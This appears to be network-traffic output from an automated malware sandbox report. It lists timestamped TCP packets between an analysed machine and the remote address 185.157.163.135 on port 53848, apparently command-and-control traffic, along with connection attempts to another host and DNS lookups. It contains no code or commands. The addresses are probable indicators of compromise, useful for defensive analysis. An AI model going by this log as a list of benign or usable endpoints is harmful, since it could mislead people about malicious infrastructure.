                                                  Oct 21, 2024 17:06:03.069727898 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.069740057 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.069787025 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.069787025 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.069825888 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.070151091 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.231930971 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.231971979 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232028961 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232074976 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232105970 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232105970 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232240915 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232311010 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232326031 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232343912 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232387066 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232399940 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232414961 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232434988 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232434988 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232448101 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232462883 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232536077 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232584953 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232599974 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232628107 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232789040 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232829094 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.232917070 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232928038 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.232939005 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233010054 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233045101 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233045101 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233082056 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233092070 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233211994 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233227015 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233238935 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233267069 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233697891 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233710051 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233728886 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233740091 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233752012 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233762980 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233776093 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233788013 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233798027 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.233797073 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233798027 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233880043 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.233880043 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234066010 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234088898 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234101057 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234134912 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234148979 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234160900 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234164000 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234170914 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234199047 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234240055 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234333992 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234458923 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234468937 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234479904 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234519005 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234543085 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234581947 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234846115 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234855890 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234869957 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234877110 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234886885 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234894037 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.234913111 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.234940052 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.235025883 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.237529039 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.237584114 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.237596989 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.237597942 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.237608910 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.237648010 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.238255024 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238265038 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238305092 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.238336086 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238346100 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238374949 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.238430023 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238442898 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238466024 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.238775015 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238851070 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238862991 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.238882065 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.238898039 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239192963 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239204884 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239228010 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239239931 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239244938 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239253998 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239264011 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239284039 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239335060 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239448071 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239489079 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239631891 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239675999 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239758015 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239859104 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.239864111 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.239893913 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240091085 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240111113 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240175962 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240175962 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240348101 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240360022 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240371943 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240384102 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240405083 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240405083 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240417957 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240431070 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240437031 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240442991 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240520000 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240531921 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240540028 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240540028 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240642071 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240664959 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240675926 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240756035 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240767956 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240780115 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240792036 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240884066 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240901947 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240914106 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240925074 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.240994930 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.240994930 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241107941 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241121054 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241132975 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241147041 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241168976 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241193056 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241244078 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241328955 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241339922 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241350889 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241389990 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241404057 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241472960 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241485119 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241497040 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241508961 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241548061 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241548061 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241575003 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241652012 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241662025 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241691113 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.241831064 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.241888046 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242125034 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242201090 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242254019 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242263079 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242264032 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242278099 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242289066 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242330074 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242330074 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242368937 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242381096 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242392063 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242418051 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242458105 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242520094 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242531061 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242546082 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242556095 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242564917 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242598057 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242616892 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242690086 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242732048 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242748976 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242759943 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242803097 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242803097 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242876053 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242888927 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242938995 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.242981911 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.242994070 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243006945 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243016958 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243041992 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.243069887 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.243077040 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243089914 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243096113 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243156910 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.243163109 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243191957 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243212938 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.243282080 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243347883 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243376017 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.243586063 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243596077 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.243628025 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.248632908 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.278630018 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278641939 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278717041 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278739929 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.278796911 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278808117 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278819084 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.278830051 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278842926 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278867006 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.278882980 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.278882980 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.278980017 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279067993 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279078007 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279107094 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279160023 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279165030 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279175997 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279232025 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279428959 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279441118 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279453993 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279501915 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279572964 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279586077 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279597044 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279608965 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279620886 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279637098 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279645920 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279645920 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279650927 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279675007 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279711962 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279740095 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279746056 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279759884 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279795885 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279892921 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279907942 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279920101 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279932022 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279951096 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.279980898 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.279992104 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.280019045 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.280019045 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.280109882 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.280158997 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:03.280164003 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.280177116 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:03.280219078 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:08.324421883 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:08.373826027 CEST6509753848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:08.379229069 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.059614897 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:09.066464901 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066503048 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066515923 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066528082 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:09.066534996 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066546917 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066555023 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:09.066556931 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066567898 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.066574097 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:09.067567110 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.067665100 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.067713976 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.071887970 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.071928978 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.071938992 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.072036028 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.072079897 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.072154045 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.072165966 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.080792904 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:09.088242054 CEST5384865098185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:09.088308096 CEST6509853848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:38.384294033 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:06:38.385659933 CEST6509753848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:06:38.391845942 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:07:08.399091959 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:07:08.400248051 CEST6509753848192.168.2.8185.157.163.135
                                                  Oct 21, 2024 17:07:08.405580044 CEST5384865097185.157.163.135192.168.2.8
                                                  Oct 21, 2024 17:07:25.609431982 CEST6509980192.168.2.8178.237.33.50
                                                  Oct 21, 2024 17:07:25.968483925 CEST6509980192.168.2.8178.237.33.50
                                                  Oct 21, 2024 17:07:26.656032085 CEST6509980192.168.2.8178.237.33.50
                                                  Oct 21, 2024 17:07:27.859105110 CEST6509980192.168.2.8178.237.33.50
                                                  Oct 21, 2024 17:07:30.265346050 CEST6509980192.168.2.8178.237.33.50
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 21, 2024 17:05:21.305414915 CEST6529353192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:05:21.321065903 CEST53652931.1.1.1192.168.2.8
                                                  Oct 21, 2024 17:05:24.372006893 CEST6547753192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:05:24.831897974 CEST53654771.1.1.1192.168.2.8
                                                  Oct 21, 2024 17:05:55.123523951 CEST5818553192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:05:56.124644995 CEST5818553192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:05:57.124732018 CEST5818553192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:05:57.132119894 CEST53581851.1.1.1192.168.2.8
                                                  Oct 21, 2024 17:05:59.134072065 CEST53581851.1.1.1192.168.2.8
                                                  Oct 21, 2024 17:05:59.134089947 CEST53581851.1.1.1192.168.2.8
                                                  Oct 21, 2024 17:06:00.626456976 CEST6164853192.168.2.81.1.1.1
                                                  Oct 21, 2024 17:06:00.638137102 CEST53616481.1.1.1192.168.2.8
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
